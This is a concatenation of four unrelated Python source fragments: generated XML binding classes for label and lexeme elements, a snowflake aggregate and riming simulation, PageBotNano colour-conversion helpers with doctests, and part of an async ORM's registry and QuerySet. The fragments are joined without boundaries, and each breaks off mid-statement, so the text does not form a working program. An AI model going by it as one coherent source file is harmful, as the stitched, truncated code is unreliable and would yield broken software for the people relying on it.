[]) for child in node: nodeName_ = Tag_pattern_.match(child.tag).groups()[-1] self.buildChildren(child, node, nodeName_) def buildAttributes(self, node, attrs, already_processed): value = attrs.get('name') if value is not None and 'name' not in already_processed: already_processed.append('name') self.name = value value = attrs.get('rank') if value is not None and 'rank' not in already_processed: already_processed.append('rank') self.rank = value def buildChildren(self, child_, node, nodeName_, fromsubclass_=False): if nodeName_ == 'label': obj_ = labelType.factory() obj_.build(child_) self.label.append(obj_) # end class layerType class labelType(GeneratedsSuper): subclass = None superclass = None def __init__(self, itype=None, name=None, bgColor=None, feID=None, start=None, end=None, cBy=None, fgColor=None, valueOf_=None): self.itype = _cast(None, itype) self.name = _cast(None, name) self.bgColor = _cast(None, bgColor) self.feID = _cast(int, feID) self.start = _cast(None, start) self.end = _cast(None, end) self.cBy = _cast(None, cBy) self.fgColor = _cast(None, fgColor) self.valueOf_ = valueOf_ def factory(*args_, **kwargs_): if labelType.subclass: return labelType.subclass(*args_, **kwargs_) else: return labelType(*args_, **kwargs_) factory = staticmethod(factory) def get_itype(self): return self.itype def set_itype(self, itype): self.itype = itype def get_name(self): return self.name def set_name(self, name): self.name = name def get_bgColor(self): return self.bgColor def set_bgColor(self, bgColor): self.bgColor = bgColor def get_feID(self): return self.feID def set_feID(self, feID): self.feID = feID def get_start(self): return self.start def set_start(self, start): self.start = start def get_end(self): return self.end def set_end(self, end): self.end = end def get_cBy(self): return self.cBy def set_cBy(self, cBy): self.cBy = cBy def get_fgColor(self): return self.fgColor def set_fgColor(self, fgColor): self.fgColor = fgColor def get_valueOf_(self): return self.valueOf_ def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_ def export(self, outfile, level, namespace_='fn:', name_='labelType', namespacedef_=''): showIndent(outfile, level) outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', )) self.exportAttributes(outfile, level, [], namespace_, name_='labelType') if self.hasContent_(): outfile.write('>') outfile.write(self.valueOf_) self.exportChildren(outfile, level + 1, namespace_, name_) outfile.write('</%s%s>\n' % (namespace_, name_)) else: outfile.write('/>\n') def exportAttributes(self, outfile, level, already_processed, namespace_='fn:', name_='labelType'): if self.itype is not None and 'itype' not in already_processed: already_processed.append('itype') outfile.write(' itype=%s' % (self.gds_format_string(quote_attrib(self.itype).encode(ExternalEncoding), input_name='itype'), )) if self.name is not None and 'name' not in already_processed: already_processed.append('name') outfile.write(' name=%s' % (self.gds_format_string(quote_attrib(self.name).encode(ExternalEncoding), input_name='name'), )) if self.bgColor is not None and 'bgColor' not in already_processed: already_processed.append('bgColor') outfile.write(' bgColor=%s' % (quote_attrib(self.bgColor), )) if self.feID is not None and 'feID' not in already_processed: already_processed.append('feID') outfile.write(' feID="%s"' % self.gds_format_integer(self.feID, input_name='feID')) if self.start is not None and 'start' not in already_processed: already_processed.append('start') outfile.write(' start=%s' % (quote_attrib(self.start), )) if self.end is not None and 'end' not in already_processed: already_processed.append('end') outfile.write(' end=%s' % (quote_attrib(self.end), )) if self.cBy is not None and 'cBy' not in already_processed: already_processed.append('cBy') outfile.write(' cBy=%s' % (self.gds_format_string(quote_attrib(self.cBy).encode(ExternalEncoding), input_name='cBy'), )) if self.fgColor is not None and 'fgColor' not in already_processed: already_processed.append('fgColor') outfile.write(' fgColor=%s' % (quote_attrib(self.fgColor), )) def exportChildren(self, outfile, level, namespace_='fn:', name_='labelType', fromsubclass_=False): pass def hasContent_(self): if ( self.valueOf_ ): return True else: return False def exportLiteral(self, outfile, level, name_='labelType'): level += 1 self.exportLiteralAttributes(outfile, level, [], name_) if self.hasContent_(): self.exportLiteralChildren(outfile, level, name_) showIndent(outfile, level) outfile.write('valueOf_ = """%s""",\n' % (self.valueOf_,)) def exportLiteralAttributes(self, outfile, level, already_processed, name_): if self.itype is not None and 'itype' not in already_processed: already_processed.append('itype') showIndent(outfile, level) outfile.write('itype = "%s",\n' % (self.itype,)) if self.name is not None and 'name' not in already_processed: already_processed.append('name') showIndent(outfile, level) outfile.write('name = "%s",\n' % (self.name,)) if self.bgColor is not None and 'bgColor' not in already_processed: already_processed.append('bgColor') showIndent(outfile, level) outfile.write('bgColor = %s,\n' % (self.bgColor,)) if self.feID is not None and 'feID' not in already_processed: already_processed.append('feID') showIndent(outfile, level) outfile.write('feID = %d,\n' % (self.feID,)) if self.start is not None and 'start' not in already_processed: already_processed.append('start') showIndent(outfile, level) outfile.write('start = %s,\n' % (self.start,)) if self.end is not None and 'end' not in already_processed: already_processed.append('end') showIndent(outfile, level) outfile.write('end = %s,\n' % (self.end,)) if self.cBy is not None and 'cBy' not in already_processed: already_processed.append('cBy') showIndent(outfile, level) outfile.write('cBy = "%s",\n' % (self.cBy,)) if self.fgColor is not None and 'fgColor' not in already_processed: already_processed.append('fgColor') showIndent(outfile, level) outfile.write('fgColor = %s,\n' % (self.fgColor,)) def exportLiteralChildren(self, outfile, level, name_): pass def build(self, node): self.buildAttributes(node, node.attrib, []) self.valueOf_ = get_all_text_(node) for child in node: nodeName_ = Tag_pattern_.match(child.tag).groups()[-1] self.buildChildren(child, node, nodeName_) def buildAttributes(self, node, attrs, already_processed): value = attrs.get('itype') if value is not None and 'itype' not in already_processed: already_processed.append('itype') self.itype = value value = attrs.get('name') if value is not None and 'name' not in already_processed: already_processed.append('name') self.name = value value = attrs.get('bgColor') if value is not None and 'bgColor' not in already_processed: already_processed.append('bgColor') self.bgColor = value value = attrs.get('feID') if value is not None and 'feID' not in already_processed: already_processed.append('feID') try: self.feID = int(value) except ValueError, exp: raise_parse_error(node, 'Bad integer attribute: %s' % exp) value = attrs.get('start') if value is not None and 'start' not in already_processed: already_processed.append('start') self.start = value value = attrs.get('end') if value is not None and 'end' not in already_processed: already_processed.append('end') self.end = value value = attrs.get('cBy') if value is not None and 'cBy' not in already_processed: already_processed.append('cBy') self.cBy = value value = attrs.get('fgColor') if value is not None and 'fgColor' not in already_processed: already_processed.append('fgColor') self.fgColor = value def buildChildren(self, child_, node, nodeName_, fromsubclass_=False): pass # end class labelType class lexemeType(GeneratedsSuper): subclass = None superclass = None def __init__(self, order=None, headword=None, breakBefore=None, name=None, POS=None, valueOf_=None): self.order = _cast(None, order) self.headword = _cast(bool, headword) self.breakBefore = _cast(bool, breakBefore) self.name = _cast(None, name) self.POS = _cast(None, POS) self.valueOf_ = valueOf_ def factory(*args_, **kwargs_): if lexemeType.subclass: return lexemeType.subclass(*args_, **kwargs_) else: return lexemeType(*args_, **kwargs_) factory = staticmethod(factory) def get_order(self): return self.order def set_order(self, order): self.order = order def get_headword(self): return self.headword def set_headword(self, headword): self.headword = headword def get_breakBefore(self): return self.breakBefore def set_breakBefore(self, breakBefore): self.breakBefore = breakBefore def get_name(self): return self.name def set_name(self, name): self.name = name def get_POS(self): return self.POS def set_POS(self, POS): self.POS = POS def get_valueOf_(self): return self.valueOf_ def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_ def export(self, outfile, level, namespace_='fn:', name_='lexemeType', namespacedef_=''): showIndent(outfile, level) outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', )) self.exportAttributes(outfile, level, [], namespace_, name_='lexemeType') if self.hasContent_(): outfile.write('>') outfile.write(self.valueOf_) self.exportChildren(outfile, level + 1, namespace_, name_) outfile.write('</%s%s>\n' % (namespace_, name_)) else: outfile.write('/>\n') def exportAttributes(self, outfile, level, already_processed, namespace_='fn:', name_='lexemeType'): if self.order is not None and 'order' not in already_processed: already_processed.append('order') outfile.write(' order=%s' % (quote_attrib(self.order), )) if self.headword is not None and 'headword' not in already_processed: already_processed.append('headword') outfile.write(' headword="%s"' % self.gds_format_boolean(self.gds_str_lower(str(self.headword)), input_name='headword')) if self.breakBefore is not None and 'breakBefore' not in already_processed: already_processed.append('breakBefore') outfile.write(' breakBefore="%s"' % self.gds_format_boolean(self.gds_str_lower(str(self.breakBefore)), input_name='breakBefore')) if self.name is not None
""" # measurements of the other particle if particle is None: particle = self._generator.generate().T x = particle[:,0] y = particle[:,1] z = particle[:,2] extent = [[x.min(), x.max()], [y.min(), y.max()], [z.min(), z.max()]] grid_res = self.grid_res grid_res_sqr = grid_res**2 # limits for random positioning of the other particle x0 = (self.extent[0][0]-extent[0][1]) x1 = (self.extent[0][1]-extent[0][0]) y0 = (self.extent[1][0]-extent[1][1]) y1 = (self.extent[1][1]-extent[1][0]) site_found = False while not site_found: # randomize location in x,y plane x_shift = x0+np.random.rand()*(x1-x0) y_shift = y0+np.random.rand()*(y1-y0) xs = x+x_shift ys = y+y_shift # the overlap between this aggregate and the other particle in # the shifted position overlapping_range = \ [max(xs.min(),self.extent[0][0])-grid_res, min(xs.max(),self.extent[0][1])+grid_res, max(ys.min(),self.extent[1][0])-grid_res, min(ys.max(),self.extent[1][1])+grid_res] if (overlapping_range[0] >= overlapping_range[1]) or \ (overlapping_range[2] >= overlapping_range[3]): # no overlap, so impossible to connect -> stop if required: continue else: break # elements from this particle that are candidates for connection X_filter = \ (self.X[:,0] >= overlapping_range[0]) & \ (self.X[:,0] < overlapping_range[1]) & \ (self.X[:,1] >= overlapping_range[2]) & \ (self.X[:,1] < overlapping_range[3]) overlapping_X = self.X[X_filter,:] if not len(overlapping_X): if required: continue else: break # index candidate particles in x,y plane elem_index = Index2D(elem_size=grid_res) elem_index.insert(overlapping_X[:,:2],overlapping_X) # candidates from the other particle X_filter = \ (xs >= overlapping_range[0]) & \ (xs < overlapping_range[1]) & \ (ys >= overlapping_range[2]) & \ (ys < overlapping_range[3]) overlapping_Xp = np.vstack(( xs[X_filter],ys[X_filter],z[X_filter])).T # find displacement in z direction min_z_sep = np.inf for elem in overlapping_Xp: # find elements in this aggregate that are near the # currently tested element in the x,y plane candidates = elem_index.items_near(elem[:2], grid_res) min_z_sep = min(min_z_sep, min_z_separation(candidates, elem, grid_res_sqr)) site_found = not np.isinf(min_z_sep) if not required: break if site_found: # move the candidate to the right location in the z direction zs = z+min_z_sep+pen_depth p_shift = np.vstack((xs,ys,zs)).T if ident is None: ident = np.zeros(p_shift.shape[0], dtype=np.int32) self.add_elements(p_shift, ident=ident) return site_found def align(self): """Align the aggregate along the principal axes. The longest principal axis becomes oriented along the x-axis, the second longest along the y-axis, and the shortest along the z-axis. """ # get and normalize principal axes PA = self.principal_axes() PA /= np.sqrt((PA**2).sum(0)) # project to principal axes self.X = np.dot(self.X,PA) self.update_extent() def rotate(self,rotator): """Rotate the aggregate. Args: rotator: The rotator to be used for the rotation. See the rotator module. """ self.X = self.X-self.X.mean(0) self.X = rotator.rotate(self.X.T).T self.update_extent() def visualize(self, bgcolor=(1,1,1), fgcolor=(.8,.8,.8)): """Visualize the aggregate using Mayavi. Args: bgcolor: Background color for the Mayavi scene. fgcolor: Foreground color for the Mayavi scene. """ color_list = [colors.colorConverter.to_rgb(c) for c in [ "#a6cee3", "#1f78b4", "#b2df8a", "#33a02c", "#fb9a99", "#e31a1c", "#fdbf6f", "#ff7f00", "#cab2d6", "#6a3d9a", "#ffff99", "#b15928" ]] # local import as this can take a while from mayavi import mlab mlab.figure(bgcolor=bgcolor, fgcolor=fgcolor) i = 0 for ident in xrange(self.ident.min(), self.ident.max()+1): X = self.X[self.ident==ident,:] if X.shape[0] > 0: mlab.points3d(X[:,0], X[:,1], X[:,2], color=color_list[i%len(color_list)], mode="cube", scale_factor=self._generator.grid_res) i += 1 def grid(self, res=None): """Arrange elements on a regular grid. The gridded coordinates are the element coordinates divided by the res parameter and then rounded to the nearest integer. This routine both conserves the number of elements and gives a unique grid location for each aggregate element. If more than one elements would end up in the same grid location, all but one are relocated into nearby empty spots on the grid. Args: res: The resolution of the grid. Should be usually left at the default, which is the aggregate element spacing. Returns: An integer array with the gridded element coordinates as multiples of res. """ if res==None: res = self.grid_res # This does most of the work! Xc = (self.X/res).round().astype(int) # The rest is to identify elements that would end up in the same # location and move them around N = Xc.shape[0] sort_ind = np.lexsort((Xc[:,2],Xc[:,1],Xc[:,0])) Xc = Xc[sort_ind,:] overlap = abs(np.diff(Xc,axis=0)).sum(1) == 0 overlap = np.hstack((overlap, False)) Xc_overlap = Xc[overlap,:].copy() Xc = Xc[~overlap,:] np.random.shuffle(Xc_overlap) for i in xrange(Xc_overlap.shape[0]): Xm = Xc_overlap[i,:] for dX in neighbors_by_distance(): X = Xm+dX if not row_is_in_sorted_array(X, Xc): Xc = insert_missing_row_in_sorted_array(X, Xc) break return Xc def add_elements(self, added_elements, ident=0, update=True): """Add elements to this aggregate. Args: added_elements: A (N,3) array with the coordinates of the added elements. ident: A (N,) array with the numerical identifiers of the added elements. update: If True, the coordinates are recentered after the update. This is should usually be left at True, but if you call add_elements multiple times without calls to other Aggregate member functions, it will save computational effort to set update=False and then call update_coordinates manually after you're done. """ self.X = np.vstack((self.X, added_elements)) self.ident = np.hstack((self.ident, np.full(added_elements.shape[0], ident, dtype=np.int32))) if update: self.update_coordinates() def remove_elements(self, removed_elements, tolerance=0.001, update=True): """Remove elements found at the given coordinates. Args: removed_elements: The coordinates of the elements to remove. tolerance: The distance from each coordinate in removed_elements, in multiples of grid_res, in which the elements should be removed. update: See the update keyword argument in add_elements. """ keep = np.ones(self.X.shape[0], dtype=bool) for re in removed_elements: dist_sqr = ((self.X-re)**2).sum(1) min_dist = dist_sqr.argmin() keep[dist_sqr < (self.grid_res**2 * tolerance)] = False self.X = self.X[keep,:] self.ident = self.ident[keep] if update: self.update_coordinates() def update_coordinates(self): """Recenter the aggregate and update the particle extent. """ self.X -= self.X.mean(0) self.update_extent() def spheres_overlap(X0, X1, r_sqr): return (X1[0]-X0[0])**2 + (X1[1]-X0[1])**2 + \ (X1[2]-X0[2])**2 < r_sqr def compare_row(x,y): if x[0] > y[0]: return 1 elif x[0] < y[0]: return -1 elif len(x)>1: return compare_row(x[1:],y[1:]) else: return 0 def row_is_in_sorted_array(r, x): i0 = 0 i1 = x.shape[0] while (i1-i0)>1: i = (i0+i1)//2 c = compare_row(r,x[i,:]) if c == 0: return True elif c == 1: i0=i else: i1=i return not bool(compare_row(r,x[i0,:])) def insert_missing_row_in_sorted_array(r, x): i0 = 0 i1 = x.shape[0] while (i1-i0)>1: i = (i0+i1)//2 c = compare_row(r,x[i,:]) if c == 1: i0=i else: i1=i if i1 > 1: insert_ind = i1 else: insert_ind = 1 if compare_row(r,x[i0,:])==1 else 0 return np.vstack((x[:insert_ind,:], r.reshape((1,3)), x[insert_ind:,:])) def outer_layer_of_cube(cube_rad): """Outer layer of cube. Generates the coordinates on the outer layer of a cube centered at (0,0,0) with side of (2*cube_rad+1). """ irange = list(xrange(-cube_rad, cube_rad+1)) for dx in irange: for dy in irange: if (abs(dx)==cube_rad) or (abs(dy)==cube_rad): dz_iter = irange else: dz_iter = (-cube_rad, cube_rad) for dz in dz_iter: yield (dx, dy, dz) def neighbors_by_distance(): cube_rad = 1 while True: for p in outer_layer_of_cube(cube_rad): yield p cube_rad += 1 class RimedAggregate(Aggregate): """A volume-element rimed aggregate model. This class adds the add_rime_particles member function to the Aggregate base class. See the documentation for Aggregate for more information. """ RIME_IDENT = -1 def add_rime_particles(self, N=1, pen_depth=120e-6, compact_dist=0.): """Add rime particles to the aggregate. Args: N: Number of rime particles to add. pen_depth: The penetration depth, i.e. the distance that the rime particle is allowed to penetrate inside this particle. """ grid_res = self.grid_res grid_res_sqr = grid_res**2 # limits for random positioning of rime particle x0 = (self.extent[0][0]) x1 = (self.extent[0][1]) y0 = (self.extent[1][0]) y1 = (self.extent[1][1]) use_indexing = (N > 1) if use_indexing: elem_index = Index2D(elem_size=grid_res) elem_index.insert(self.X[:,:2],self.X) def find_overlapping(x,y,dist_mul=1): p_near = np.array(list(elem_index.items_near((x,y), grid_res*dist_mul))) if not p_near.shape[0]: return p_near p_filter = ((p_near[:,:2]-[x,y])**2).sum(1) < grid_res_sqr*dist_mul**2 return p_near[p_filter,:] else: def find_overlapping(x,y,dist_mul=1): X_filter = ((self.X[:,:2] - np.array([x,y]))**2).sum(1) < grid_res_sqr*dist_mul**2 return self.X[X_filter,:] if compact_dist > 0: if use_indexing: elem_index_3d = Index3D(elem_size=grid_res) elem_index_3d.insert(self.X) def find_overlapping_3d(x,y,z,dist_mul=1): p_near = np.array(list(elem_index_3d.items_near((x,y,z), grid_res*dist_mul))) if not p_near.shape[0]: return p_near p_filter = ((p_near-[x,y,z])**2).sum(1) < grid_res_sqr*dist_mul**2 return p_near[p_filter,:] else: def find_overlapping_3d(x,y,z,dist_mul=1): X_filter = ((self.X - np.array([x,y,z]))**2).sum(1) < grid_res_sqr*dist_mul**2 return self.X[X_filter,:] added_particles = np.empty((N, 3)) for particle_num in xrange(N): site_found = False while not site_found: xs = x0+np.random.rand()*(x1-x0) ys = y0+np.random.rand()*(y1-y0) overlapping_range = [xs-grid_res, xs+grid_res, ys-grid_res, ys+grid_res] overlapping_X = find_overlapping(xs, ys) if not overlapping_X.shape[0]: continue X_order = overlapping_X[:,2].argsort() overlapping_X = overlapping_X[X_order,:] last_ind =
#!/usr/bin/env python3 # -*- coding: UTF-8 -*- # ----------------------------------------------------------------------------- # # P A G E B O T N A N O # # Copyright (c) 2020+ <NAME> + <NAME> # www.pagebot.io # Licensed under MIT conditions # # Supporting DrawBot, www.drawbot.com # ----------------------------------------------------------------------------- # # color.py # # This source contains supporting functions for PageBotNano classes. # from copy import copy import sys sys.path.insert(0, "../..") # So we can import pagebotnano without installing. from pagebot.constants import CSS_COLOR_NAMES, SPOT_RGB, RAL_NAMERGB, NAME_RALRGB def value01(v): """Round float to 0 or 1 int if equal. >>> value01(0.0) 0 >>> value01(1.0) 1 >>> value01(0.5) 0.5 >>> value01(False) 0 >>> value01(100) 1 """ if v <= 0: return 0 if v >= 1: return 1 return v def asRgb(c, *args): """Answers the color as RGB tuple. If `c` is a list or a tuple, then answer the RGB tuples in the same structure. >>> asRgb(color(1, 0, 0)) (1, 0, 0) >>> asRgb(color(1, 0, 0), color(0, 1, 0)) ((1, 0, 0), (0, 1, 0)) >>> # Nested tuples. >>> asRgb(color(1, 0, 0), (color(0, 1, 0), color(0, 0, 1))) ((1, 0, 0), ((0, 1, 0), (0, 0, 1))) >>> # Interpreted as list of colors, not as RGB values for one color. >>> asRgb(1, 0, 0) ((1, 1, 1), (0, 0, 0), (0, 0, 0)) """ if args: if not isinstance(c, (list, tuple)): c = [c] c = list(c) for arg in args: c.append(arg) if isinstance(c, (list, tuple)): rcc = [] for cc in c: cc = asRgb(cc) rcc.append(cc) return tuple(rcc) if not isinstance(c, Color): c = color(c) if c is not None: return c.rgb return None def int2Rgb(v): """Converts an integer (basically the value of the hex string) to (r, g, b). >>> '%0.2f, %0.2f, %0.2f' % int2Rgb(12345) '0.00, 0.19, 0.22' >>> '%0.2f, %0.2f, %0.2f' % int2Rgb(65281) '0.00, 1.00, 0.00' >>> int2Rgb(255) (0, 0, 1) >>> int2Rgb(255**2 + 255) (0, 1, 0) >>> color('#FFFFFF').int 16777215 >>> color('#888888').int 8947848 >>> color('#0000FF').int 255 """ return value01(((v >> 16) & 255)/255.0), value01(((v >> 8) & 255)/255.0), value01((v & 255)/255.0) def cmyk2Rgb(cmyk) : """Simple straight conversion from (c,m,y,k) to (r,g,b), not using any profiles. >>> cmyk2Rgb((1, 1, 0, 0)) (0, 0, 1) >>> # Bi-direcional conversion test. >>> cmyk = rgb2Cmyk((1, 1, 0)) >>> cmyk2Rgb(cmyk) (1, 1, 0) >>> # Bi-direcional conversion test. >>> cmyk = rgb2Cmyk((1, 0.5, 0)) >>> cmyk2Rgb((cmyk)) (1, 0.5, 0) """ c, m, y, k = cmyk return ( value01(1 - ((min(1.0, c * (1 - k) + k)))), value01(1 - ((min(1, m * (1 - k) + k)))), value01(1 - ((min(1, y * (1 - k) + k)))) ) def rgb2Cmyk(rgb): """Simple straight conversion from (r,g,b) to (c,m,y,k), not using any profiles). >>> rgb2Cmyk((0, 0, 0)) (0, 0, 0, 1) >>> rgb2Cmyk((1, 0, 0)) (0, 1, 1, 0) >>> rgb2Cmyk((1, 1, 0)) (0, 0, 1, 0) >>> rgb2Cmyk((1, 1, 1)) (0, 0, 0, 0) >>> rgb2Cmyk((0.5, 0.5, 0.5)) (0, 0, 0, 0.5) """ if rgb == (0, 0, 0): # black return 0, 0, 0, 1 # K = cmyk scale r, g, b = rgb # rgb [0,1] -> cmy [0,1] c = 1 - r m = 1 - g y = 1 - b # extract out k [0,1] min_cmy = min(c, m, y) c -= min_cmy m -= min_cmy y -= min_cmy k = min_cmy # rescale to the range [0,cmyk_scale] return value01(c), value01(m), value01(y), value01(k) def ral2NameRgb(ral, default=None): """Answers the RGB of RAL color number or name. If the value does not exist, answer default or black. >>> ral2NameRgb('red')[0] in ('rubyred', 'winered') True """ nameRgb = None if isinstance(ral, str): ral = ral.lower() if ral in RAL_NAMERGB: nameRgb = RAL_NAMERGB[ral] elif ral in NAME_RALRGB: nameRgb = ral, NAME_RALRGB[ral][1] if isinstance(ral, str): # It's a name but not matching. Try smallest name that includes it. # Note that for "gray" and "grey" search, this may result in different findings. length = None for name, (_, rgb) in NAME_RALRGB.items(): if ral in name and (length is None or len(name) < length): nameRgb = name, rgb length = len(name) if nameRgb is None: nameRgb = default or ('black', (0, 0, 0)) return nameRgb def ral2Rgb(ral, default=None): """Answers the RGB or RAL color number or name. >>> '%0.2f, %0.2f, %0.2f' % ral2Rgb(9002) '0.94, 0.93, 0.90' >>> '%0.2f, %0.2f, %0.2f' % ral2Rgb('light green') '0.49, 0.80, 0.74' >>> '%0.2f, %0.2f, %0.2f' % ral2Rgb('dustygray') '0.47, 0.49, 0.50' >>> ral2Rgb('lightgreen') == ral2Rgb('light green') True >>> ral2Rgb('umbra grey') == ral2Rgb('umbra gray') True >>> ral2Rgb('grey') == ral2Rgb('gray') # Partial name finds other result False """ """ FIXME (issue : >>> '%0.2f, %0.2f, %0.2f' % ral2Rgb('red') Sublime says: '0.31, 0.07, 0.10' Travis says: '0.54, 0.07, 0.08' """ return ral2NameRgb(ral, default)[1] def rgb2RalName(rgb): """Answers the closest spot value that fits the RGB value. >>> rgb2RalName((0.49, 0.80, 0.74)) (6027, 'light green') >>> rgb2RalName((0, 0, 0)) (9005, 'jet black') >>> rgb2RalName((1, 1, 1)) (9003, 'signal white') >>> rgb2RalName((1, 1, 1)) (9003, 'signal white') >>> rgb2RalName((0.5, 0.5, 0.5)) (7037, 'dusty grey') """ foundRal = None r, g, b, = rgb error = None # Max combined error for the 3 colors. for ral, (name, (rr, rg, rb)) in RAL_NAMERGB.items(): e = abs(rr - r) + abs(rg - g) + abs(rb - b) if error is None or e < error: foundRal = ral, name error = e return foundRal def spot2Rgb(spot, default=None): """Answers the RGB value of spot color. If the value does not exist, answer default of black. >>> '%0.2f, %0.2f, %0.2f' % spot2Rgb(300) '0.00, 0.45, 0.78' >>> # Nonexistent spot colors map to default or black. >>> spot2Rgb(10000000) (0, 0, 0) """ return SPOT_RGB.get(spot, default or (0, 0, 0)) def rgb2Spot(rgb): """Answers the closest spot value that fits the RGB value. >>> color(0.98, 0.89, 0.5).spot 120 >>> rgb = color(spot=300).rgb >>> color(rgb=rgb).spot 300 >>> color(rgb=color(spot=110).rgb).spot # Double direction conversion test. 110 """ foundSpot = None r, g, b, = rgb error = None # Max combined error for the 3 colors. for spot, (sr, sg, sb) in SPOT_RGB.items(): e = abs(sr - r) + abs(sg - g) + abs(sb - b) if error is None or e < error: foundSpot = spot error = e return foundSpot def spot2Cmyk(spot, default=None): """Answers the CMYK value of spot color. If the value does not exist, answer default of black. Note that this is a double conversion: spot-->rgb-->cmyk >>> '%0.2f, %0.2f, %0.2f, %0.2f' % spot2Cmyk(300) '0.78, 0.33, 0.00, 0.22' >>> # Nonexistent spot colors map to default or black. >>> spot2Cmyk(10000000) (0, 0, 0, 1) """ return rgb2Cmyk(spot2Rgb(spot, default=default)) def cmyk2Spot(cmyk): """Answers the closest spot value that fits the CMYK value. Note that this is a double conversion: cmyk-->rgb-->spot >>> color(c=0.25, m=0.24, y=0.00, k=0.67).spot 533 >>> color(spot=533).cmyk == spot2Cmyk(533) True >>> color(c=0.25, m=0.24, y=0.00, k=0.67).spot 533 >>> cmyk = color(spot=300).cmyk >>> #Color(cmyk=cmyk).spot # TODO: answers 285. Roundings? 300 >>> #Color(cmyk=color(spot=110).cmyk).spot # Double direction conversion test. 110 """ return rgb2Spot(cmyk2Rgb(cmyk)) def name2Rgb(name): """Method to convert a name to RGB. Answer None if no RGB can be found. >>> name2Rgb('red') (1, 0, 0) >>> name2Rgb('white') (1, 1, 1) >>> colorName = 'slategray' >>> # Get nearest rounded (r,g,b) for this spot color. >>> rgb = name2Rgb(colorName) >>> '%0.2f, %0.2f, %0.2f' % rgb '0.44, 0.50, 0.56' """ return int2Rgb(CSS_COLOR_NAMES.get(name)) def rgb2Name(rgb): """Method to convert RGB to a name. Answer None if no name can be found. >>> rgb2Name((0.2, 0.3, 0.4)) in ('darkslategray', 'darkslategrey') True >>> color(spot=300).name in ('teal', 'darkcyan') True >>> color(spot=0).name 'black' >>> color(rgb=(0.4, 0.5, 0.6)).name in ('slategrey', 'slategray') True >>> color(cmyk=(0.2, 0.2, 0.6, 0.2)).name 'darkkhaki' >>> rgb = (0.4, 0.5, 0.6) >>> color(rgb=rgb).name == rgb2Name(rgb) True """ rgbName = None r, g, b = rgb error = None # Max error for the 3 colors for name, value in CSS_COLOR_NAMES.items(): nr, ng, nb = int2Rgb(value) e = abs(nr - r) + abs(ng - g) + abs(nb - b) if error is None or e < error: rgbName = name error =
<reponame>eliclement/orm import typing import databases import sqlalchemy import typesystem from sqlalchemy.ext.asyncio import create_async_engine from orm.exceptions import MultipleMatches, NoMatch from orm.fields import Date, DateTime, String, Text FILTER_OPERATORS = { "exact": "__eq__", "iexact": "ilike", "contains": "like", "icontains": "ilike", "in": "in_", "gt": "__gt__", "gte": "__ge__", "lt": "__lt__", "lte": "__le__", } def _update_auto_now_fields(values, fields): for key, value in fields.items(): if isinstance(value, (DateTime, Date)) and value.auto_now: values[key] = value.validator.get_default_value() return values class ModelRegistry: def __init__(self, database: databases.Database) -> None: self.database = database self.models = {} self._metadata = sqlalchemy.MetaData() @property def metadata(self): for model_cls in self.models.values(): model_cls.build_table() return self._metadata async def create_all(self): url = self._get_database_url() engine = create_async_engine(url) async with self.database: async with engine.begin() as conn: await conn.run_sync(self.metadata.create_all) await engine.dispose() async def drop_all(self): url = self._get_database_url() engine = create_async_engine(url) async with self.database: async with engine.begin() as conn: await conn.run_sync(self.metadata.drop_all) await engine.dispose() def _get_database_url(self) -> str: url = self.database.url if not url.driver: if url.dialect == "postgresql": url = url.replace(driver="asyncpg") elif url.dialect == "mysql": url = url.replace(driver="aiomysql") elif url.dialect == "sqlite": url = url.replace(driver="aiosqlite") return str(url) class ModelMeta(type): def __new__(cls, name, bases, attrs): model_class = super().__new__(cls, name, bases, attrs) if "registry" in attrs: model_class.database = attrs["registry"].database attrs["registry"].models[name] = model_class if "tablename" not in attrs: setattr(model_class, "tablename", name.lower()) for name, field in attrs.get("fields", {}).items(): setattr(field, "registry", attrs.get("registry")) if field.primary_key: model_class.pkname = name return model_class @property def table(cls): if not hasattr(cls, "_table"): cls._table = cls.build_table() return cls._table @property def columns(cls) -> sqlalchemy.sql.ColumnCollection: return cls._table.columns class QuerySet: ESCAPE_CHARACTERS = ["%", "_"] def __init__( self, model_cls=None, filter_clauses=None, select_related=None, limit_count=None, offset=None, order_by=None, ): self.model_cls = model_cls self.filter_clauses = [] if filter_clauses is None else filter_clauses self._select_related = [] if select_related is None else select_related self.limit_count = limit_count self.query_offset = offset self._order_by = [] if order_by is None else order_by def __get__(self, instance, owner): return self.__class__(model_cls=owner) @property def database(self): return self.model_cls.registry.database @property def table(self) -> sqlalchemy.Table: return self.model_cls.table @property def schema(self): fields = {key: field.validator for key, field in self.model_cls.fields.items()} return typesystem.Schema(fields=fields) @property def pkname(self): return self.model_cls.pkname def _build_select_expression(self): tables = [self.table] select_from = self.table for item in self._select_related: model_cls = self.model_cls select_from = self.table for part in item.split("__"): model_cls = model_cls.fields[part].target table = model_cls.table select_from = sqlalchemy.sql.join(select_from, table) tables.append(table) expr = sqlalchemy.sql.select(tables) expr = expr.select_from(select_from) if self.filter_clauses: if len(self.filter_clauses) == 1: clause = self.filter_clauses[0] else: clause = sqlalchemy.sql.and_(*self.filter_clauses) expr = expr.where(clause) if self._order_by: order_by = list(map(self._prepare_order_by, self._order_by)) expr = expr.order_by(*order_by) if self.limit_count: expr = expr.limit(self.limit_count) if self.query_offset: expr = expr.offset(self.query_offset) return expr def filter( self, clause: typing.Optional[sqlalchemy.sql.expression.BinaryExpression] = None, **kwargs: typing.Any, ): if clause is not None: self.filter_clauses.append(clause) return self else: return self._filter_query(**kwargs) def exclude( self, clause: typing.Optional[sqlalchemy.sql.expression.BinaryExpression] = None, **kwargs: typing.Any, ): if clause is not None: self.filter_clauses.append(clause) return self else: return self._filter_query(_exclude=True, **kwargs) def _filter_query(self, _exclude: bool = False, **kwargs): clauses = [] filter_clauses = self.filter_clauses select_related = list(self._select_related) if kwargs.get("pk"): pk_name = self.model_cls.pkname kwargs[pk_name] = kwargs.pop("pk") for key, value in kwargs.items(): if "__" in key: parts = key.split("__") # Determine if we should treat the final part as a # filter operator or as a related field. if parts[-1] in FILTER_OPERATORS: op = parts[-1] field_name = parts[-2] related_parts = parts[:-2] else: op = "exact" field_name = parts[-1] related_parts = parts[:-1] model_cls = self.model_cls if related_parts: # Add any implied select_related related_str = "__".join(related_parts) if related_str not in select_related: select_related.append(related_str) # Walk the relationships to the actual model class # against which the comparison is being made. for part in related_parts: model_cls = model_cls.fields[part].target column = model_cls.table.columns[field_name] else: op = 